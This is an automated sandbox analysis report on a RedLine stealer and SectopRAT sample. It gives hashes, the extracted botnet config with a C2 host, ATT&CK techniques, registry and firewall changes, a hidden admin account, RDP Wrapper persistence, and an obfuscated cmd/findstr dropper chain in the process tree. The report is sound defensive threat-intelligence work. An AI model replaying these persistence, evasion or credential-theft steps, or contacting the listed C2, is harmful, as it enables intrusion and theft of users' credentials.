redline | 02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27/12/2024, 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34807a743f2d680eef051852eaef0b16.exe
Size

4.1MB
MD5

34807a743f2d680eef051852eaef0b16
SHA1

4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256

02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
SHA512

65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
SSDEEP

98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF

Score

10^/10

redline sectoprat adsbb defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

adsbb

21jhss.club:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/4512-53-0x0000000000DD0000-0x0000000000DEC000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/4512-53-0x0000000000DD0000-0x0000000000DEC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3384	net.exe
5056	net1.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
65	904	cscript.exe
68	3572	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3640	powershell.exe
3544	powershell.exe
4156	powershell.exe
4056	powershell.exe
4856	powershell.exe
3440	powershell.exe
2412	powershell.exe
2504	powershell.exe
4768	powershell.exe
668	powershell.exe
1532	powershell.exe
3612	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
856	netsh.exe
2504	netsh.exe
64	netsh.exe
2924	netsh.exe
4624	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	34807a743f2d680eef051852eaef0b16.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 14 IoCs

pid	Process
4856	Rifiutare.exe.com
3184	Rifiutare.exe.com
4608	Uno.exe.com
5104	Uno.exe.com
4624	Inebriato.exe.com
3572	Inebriato.exe.com
4512	RegAsm.exe
3876	RegAsm.exe
2500	RegAsm.exe
4220	RDPWInst.exe
3732	RDPWInst.exe
4608	RDPWInst.exe
2448	RDPWInst.exe
3320	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
2440	svchost.exe
4704	svchost.exe
1232	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\llfdpokopbfbggcmochmmimmnmnnemdo\3219\manifest.json	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
57	raw.githubusercontent.com
58	raw.githubusercontent.com
63	raw.githubusercontent.com
65	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/2500-79-0x0000000000900000-0x0000000000ADF000-memory.dmp	autoit_exe
behavioral2/memory/2500-84-0x0000000000900000-0x0000000000ADF000-memory.dmp	autoit_exe
behavioral2/memory/2500-82-0x0000000000900000-0x0000000000ADF000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ayYmDfWpfJ = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ayYmDfWpfJ = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3184 set thread context of 4512	3184	Rifiutare.exe.com	109
PID 5104 set thread context of 3876	5104	Uno.exe.com	110
PID 3572 set thread context of 2500	3572	Inebriato.exe.com	111

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
220	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1624	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2700	timeout.exe
1464	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1624	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3880	schtasks.exe
1744	schtasks.exe
524	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	68	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3876	RegAsm.exe
3876	RegAsm.exe
3640	powershell.exe
3640	powershell.exe
2412	powershell.exe
2412	powershell.exe
668	powershell.exe
668	powershell.exe
3544	powershell.exe
3544	powershell.exe
4156	powershell.exe
4156	powershell.exe
2504	powershell.exe
2504	powershell.exe
1532	powershell.exe
1532	powershell.exe
4056	powershell.exe
4056	powershell.exe
2440	svchost.exe
2440	svchost.exe
2440	svchost.exe
2440	svchost.exe
4704	svchost.exe
4704	svchost.exe
4704	svchost.exe
4704	svchost.exe
1232	svchost.exe
1232	svchost.exe
1232	svchost.exe
1232	svchost.exe
4856	powershell.exe
4856	powershell.exe
4768	powershell.exe
4768	powershell.exe
3612	powershell.exe
3612	powershell.exe
3440	powershell.exe
3440	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
648	Process not Found
648	Process not Found
648	Process not Found
648	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4512	RegAsm.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeIncreaseQuotaPrivilege	3844	WMIC.exe
Token: SeSecurityPrivilege	3844	WMIC.exe
Token: SeTakeOwnershipPrivilege	3844	WMIC.exe
Token: SeLoadDriverPrivilege	3844	WMIC.exe
Token: SeSystemProfilePrivilege	3844	WMIC.exe
Token: SeSystemtimePrivilege	3844	WMIC.exe
Token: SeProfSingleProcessPrivilege	3844	WMIC.exe
Token: SeIncBasePriorityPrivilege	3844	WMIC.exe
Token: SeCreatePagefilePrivilege	3844	WMIC.exe
Token: SeBackupPrivilege	3844	WMIC.exe
Token: SeRestorePrivilege	3844	WMIC.exe
Token: SeShutdownPrivilege	3844	WMIC.exe
Token: SeDebugPrivilege	3844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3844	WMIC.exe
Token: SeRemoteShutdownPrivilege	3844	WMIC.exe
Token: SeUndockPrivilege	3844	WMIC.exe
Token: SeManageVolumePrivilege	3844	WMIC.exe
Token: 33	3844	WMIC.exe
Token: 34	3844	WMIC.exe
Token: 35	3844	WMIC.exe
Token: 36	3844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3844	WMIC.exe
Token: SeSecurityPrivilege	3844	WMIC.exe
Token: SeTakeOwnershipPrivilege	3844	WMIC.exe
Token: SeLoadDriverPrivilege	3844	WMIC.exe
Token: SeSystemProfilePrivilege	3844	WMIC.exe
Token: SeSystemtimePrivilege	3844	WMIC.exe
Token: SeProfSingleProcessPrivilege	3844	WMIC.exe
Token: SeIncBasePriorityPrivilege	3844	WMIC.exe
Token: SeCreatePagefilePrivilege	3844	WMIC.exe
Token: SeBackupPrivilege	3844	WMIC.exe
Token: SeRestorePrivilege	3844	WMIC.exe
Token: SeShutdownPrivilege	3844	WMIC.exe
Token: SeDebugPrivilege	3844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3844	WMIC.exe
Token: SeRemoteShutdownPrivilege	3844	WMIC.exe
Token: SeUndockPrivilege	3844	WMIC.exe
Token: SeManageVolumePrivilege	3844	WMIC.exe
Token: 33	3844	WMIC.exe
Token: 34	3844	WMIC.exe
Token: 35	3844	WMIC.exe
Token: 36	3844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3192 wrote to memory of 384	3192	34807a743f2d680eef051852eaef0b16.exe	83
PID 3192 wrote to memory of 384	3192	34807a743f2d680eef051852eaef0b16.exe	83
PID 3192 wrote to memory of 384	3192	34807a743f2d680eef051852eaef0b16.exe	83
PID 3192 wrote to memory of 3404	3192	34807a743f2d680eef051852eaef0b16.exe	85
PID 3192 wrote to memory of 3404	3192	34807a743f2d680eef051852eaef0b16.exe	85
PID 3192 wrote to memory of 3404	3192	34807a743f2d680eef051852eaef0b16.exe	85
PID 3404 wrote to memory of 3324	3404	cmd.exe	87
PID 3404 wrote to memory of 3324	3404	cmd.exe	87
PID 3404 wrote to memory of 3324	3404	cmd.exe	87
PID 3324 wrote to memory of 4616	3324	cmd.exe	88
PID 3324 wrote to memory of 4616	3324	cmd.exe	88
PID 3324 wrote to memory of 4616	3324	cmd.exe	88
PID 3324 wrote to memory of 4856	3324	cmd.exe	89
PID 3324 wrote to memory of 4856	3324	cmd.exe	89
PID 3324 wrote to memory of 4856	3324	cmd.exe	89
PID 4856 wrote to memory of 3184	4856	Rifiutare.exe.com	90
PID 4856 wrote to memory of 3184	4856	Rifiutare.exe.com	90
PID 4856 wrote to memory of 3184	4856	Rifiutare.exe.com	90
PID 3324 wrote to memory of 508	3324	cmd.exe	91
PID 3324 wrote to memory of 508	3324	cmd.exe	91
PID 3324 wrote to memory of 508	3324	cmd.exe	91
PID 3324 wrote to memory of 4608	3324	cmd.exe	93
PID 3324 wrote to memory of 4608	3324	cmd.exe	93
PID 3324 wrote to memory of 4608	3324	cmd.exe	93
PID 4608 wrote to memory of 5104	4608	Uno.exe.com	94
PID 4608 wrote to memory of 5104	4608	Uno.exe.com	94
PID 4608 wrote to memory of 5104	4608	Uno.exe.com	94
PID 3324 wrote to memory of 4996	3324	cmd.exe	95
PID 3324 wrote to memory of 4996	3324	cmd.exe	95
PID 3324 wrote to memory of 4996	3324	cmd.exe	95
PID 3324 wrote to memory of 4624	3324	cmd.exe	97
PID 3324 wrote to memory of 4624	3324	cmd.exe	97
PID 3324 wrote to memory of 4624	3324	cmd.exe	97
PID 4624 wrote to memory of 3572	4624	Inebriato.exe.com	98
PID 4624 wrote to memory of 3572	4624	Inebriato.exe.com	98
PID 4624 wrote to memory of 3572	4624	Inebriato.exe.com	98
PID 3324 wrote to memory of 1624	3324	cmd.exe	99
PID 3324 wrote to memory of 1624	3324	cmd.exe	99
PID 3324 wrote to memory of 1624	3324	cmd.exe	99
PID 3184 wrote to memory of 4512	3184	Rifiutare.exe.com	109
PID 3184 wrote to memory of 4512	3184	Rifiutare.exe.com	109
PID 3184 wrote to memory of 4512	3184	Rifiutare.exe.com	109
PID 3184 wrote to memory of 4512	3184	Rifiutare.exe.com	109
PID 3184 wrote to memory of 4512	3184	Rifiutare.exe.com	109
PID 5104 wrote to memory of 3876	5104	Uno.exe.com	110
PID 5104 wrote to memory of 3876	5104	Uno.exe.com	110
PID 5104 wrote to memory of 3876	5104	Uno.exe.com	110
PID 3572 wrote to memory of 2500	3572	Inebriato.exe.com	111
PID 3572 wrote to memory of 2500	3572	Inebriato.exe.com	111
PID 3572 wrote to memory of 2500	3572	Inebriato.exe.com	111
PID 5104 wrote to memory of 3876	5104	Uno.exe.com	110
PID 5104 wrote to memory of 3876	5104	Uno.exe.com	110
PID 3572 wrote to memory of 2500	3572	Inebriato.exe.com	111
PID 3572 wrote to memory of 2500	3572	Inebriato.exe.com	111
PID 2500 wrote to memory of 3560	2500	RegAsm.exe	115
PID 2500 wrote to memory of 3560	2500	RegAsm.exe	115
PID 2500 wrote to memory of 3560	2500	RegAsm.exe	115
PID 3560 wrote to memory of 3640	3560	cmd.exe	117
PID 3560 wrote to memory of 3640	3560	cmd.exe	117
PID 3560 wrote to memory of 3640	3560	cmd.exe	117
PID 2500 wrote to memory of 856	2500	RegAsm.exe	118
PID 2500 wrote to memory of 856	2500	RegAsm.exe	118
PID 2500 wrote to memory of 856	2500	RegAsm.exe	118
PID 856 wrote to memory of 2412	856	cmd.exe	120

C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe
"C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3192
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  PID:384
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3324
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:4616
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
      Rifiutare.exe.com D
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4856
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3184
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4512
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:508
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
      Uno.exe.com f
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4608
